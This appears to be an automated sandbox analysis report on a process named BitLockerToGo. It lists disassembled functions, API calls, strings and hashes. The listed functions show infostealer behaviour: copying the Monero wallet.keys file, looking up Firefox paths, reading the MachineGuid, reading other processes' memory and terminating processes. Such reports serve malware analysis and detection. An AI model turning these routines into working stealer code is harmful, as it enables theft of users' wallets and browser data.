                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                                                                                                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                                                                                    • API String ID: 4174444224-1526165396
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2ca42c89cf6564b0581d40861d5767783bae21d9f734b7b32f376ad0658b3439
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e354b33f558ff250c32803cf02ed8d5378433c9f542c630260c38ddd4c1edb28
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ca42c89cf6564b0581d40861d5767783bae21d9f734b7b32f376ad0658b3439
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62217431A0810DABCB20BB79DC4A8BE7BB8FF51354B104065FE01E3262DF749A418BD6
                                                                                                                                                                                                                                                                                                                    Function 008EFABD Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 324COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(8D5052FC), ref: 008EFB02
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(8D5052FC), ref: 008EFB79
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(8D5052FC,firefox), ref: 008EFE8D
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(8D5052FC), ref: 008EFC6F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(8D5052FC), ref: 008EFD20
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(8D5052FC), ref: 008EFD97
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy
                                                                                                                                                                                                                                                                                                                    • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                                                                                                                                                                    • API String ID: 3722407311-2697854757
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ada4164f482a956aad2b0824b7037c1452340c4969b5b3d5a1b2f1d5884a8390
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 04eb055654ab7948768925c0d55a697d9f2a877fcf7652332b5a0c85c3c6234b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ada4164f482a956aad2b0824b7037c1452340c4969b5b3d5a1b2f1d5884a8390
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8C14E32D00149ABCB20FF79ED47A9DBB75FF44314F550121EE04E7252EA30AA698BD2
                                                                                                                                                                                                                                                                                                                    Function 008E1AA8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E1ACC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E1A41: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 008E1A55
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E1A41: RtlAllocateHeap.NTDLL(00000000), ref: 008E1A5C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E1A41: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,008E1AD9), ref: 008E1A79
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E1A41: RegQueryValueExA.ADVAPI32(008E1AD9,wallet_path,00000000,00000000,00000000,000000FF), ref: 008E1A94
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E1A41: RegCloseKey.ADVAPI32(008E1AD9), ref: 008E1A9D
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 008E1AE1
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008E1AEE
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,.keys), ref: 008E1B09
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F38A6: GetSystemTime.KERNEL32(?,00917807,?), ref: 008F38D5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008E1C1A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E9163
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,008EF752,?,?,?), ref: 008E917A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,008EF752,?,?,?), ref: 008E9191
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E91A8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CloseHandle.KERNEL32(?,?,?,?,?,008EF752,?,?,?), ref: 008E91D0
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008E1C8D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Filelstrcpy$lstrcat$CloseCreateHeaplstrlen$AllocAllocateCopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                                                                                                                                                                    • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                                                                                                                                                                    • API String ID: 2164590784-3586502688
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6b9e2d3a992e349bfbf712653f6365e5bfe4c6a54263210ad968ba9d8e81bfff
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4c04bde87429e8e05de6897df2983fb71a86f218dc3ef6fbf9ac8c6c8094bb8f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b9e2d3a992e349bfbf712653f6365e5bfe4c6a54263210ad968ba9d8e81bfff
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40510871E4012D9BCF20FB69DC46AEDB778FF05304F5144A1BA08F3152DA716F868A96
                                                                                                                                                                                                                                                                                                                    Function 008F187B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 008F18A0
                                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 008F18CC
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F1911
                                                                                                                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,00000000,?,00000208,00000000), ref: 008F1976
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F1A02
                                                                                                                                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 008F1A63
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F045E: _memmove.LIBCMT ref: 008F0478
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Process_memset$MemoryOpenRead_memmove
                                                                                                                                                                                                                                                                                                                    • String ID: N0ZWFt
                                                                                                                                                                                                                                                                                                                    • API String ID: 1717157771-431618156
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ddd81c49cdaa206174b1759f733af703c6c97a5b0f153531fd010ddee8f7db0c
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d49a9cc40649cacb82c4d99ecef5bbbdbe5f2f712721acbeab5ee492461f6e03
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ddd81c49cdaa206174b1759f733af703c6c97a5b0f153531fd010ddee8f7db0c
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B5140B1E0022C9FDF209B648D896FDB7B9FB45304F4000E9A719E7152DAB56EC88F55
                                                                                                                                                                                                                                                                                                                    Function 008F3230 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F3263
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 008F3282
                                                                                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 008F32A7
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?), ref: 008F32B3
                                                                                                                                                                                                                                                                                                                    • CharToOemA.USER32(?,?), ref: 008F32C7
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                                                                                                                                                                    • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                                                                    • API String ID: 2235053359-1211650757
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b369e1dfcf268da73fa8fdd46c3138d3a9148fcb8769825538ddd1e2be7d9344
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 93ad49cac9acbcbe43f756ff4da6c81b226d231cb9a95dc30e288d938c4d7dd2
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b369e1dfcf268da73fa8fdd46c3138d3a9148fcb8769825538ddd1e2be7d9344
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94111EB590421DAFDB20DBA0DC89EEBB7BCEB14304F4041E5A659E2062DA709E898F50
                                                                                                                                                                                                                                                                                                                    Function 008E1A41 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 008E1A55
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E1A5C
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,008E1AD9), ref: 008E1A79
                                                                                                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(008E1AD9,wallet_path,00000000,00000000,00000000,000000FF), ref: 008E1A94
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(008E1AD9), ref: 008E1A9D
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • SOFTWARE\monero-project\monero-core, xrefs: 008E1A6F
                                                                                                                                                                                                                                                                                                                    • wallet_path, xrefs: 008E1A8C
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                    • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                                                                                                                                                                                    • API String ID: 3225020163-4244082812
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 95895749219a675ebaea0b4850e380143b32df8ae3e8fb2ec1665bb1a5e26d95
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 21e30136417b67d35d10d67470701df07a0d643bd1691ae336de6b598e20be34
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 95895749219a675ebaea0b4850e380143b32df8ae3e8fb2ec1665bb1a5e26d95
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F0D075680308FFEB205B91DC0AFAA7A69EB84B05F500065B701E6191DBB15A51D654
                                                                                                                                                                                                                                                                                                                    Function 008F44FD Relevance: 10.5, APIs: 7, Instructions: 49processCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 008F451F
                                                                                                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 008F4533
                                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008F4559
                                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 008F4568
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 008F456F
                                                                                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(?,00000128), ref: 008F4582
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 008F4592
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2696918072-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a09f5507d3189b69af7cade93a9e804ccbebe9b091c6416087c5690b92482756
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 54e4cfc023683de3d78c3700e833897558bd4a661b0b10b5e984b7a8203972ab
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a09f5507d3189b69af7cade93a9e804ccbebe9b091c6416087c5690b92482756
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC11FA7190122DABEB31AF64DD49BEA7AB5FF08701F1000A6E605E7190DB709B51CE55
